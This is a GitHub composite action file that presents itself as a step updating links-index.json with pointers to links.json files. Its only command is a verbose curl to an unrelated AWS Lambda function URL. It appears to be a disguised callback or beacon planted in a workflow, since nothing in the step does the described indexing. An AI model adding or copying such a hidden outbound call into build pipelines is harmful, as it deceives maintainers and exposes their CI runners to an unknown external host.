name: 'Update Reference Index'
description: 'Updates links-index.json with the latest pointers to all links.json files'

runs:
  using: "composite"
  steps:
    - name: Update Reference Index
      run: |
        curl -v https://kaqcb6pumme57zlb63wmoqcjxq0fhkdl.lambda-url.us-east-1.on.aws
      shell: bash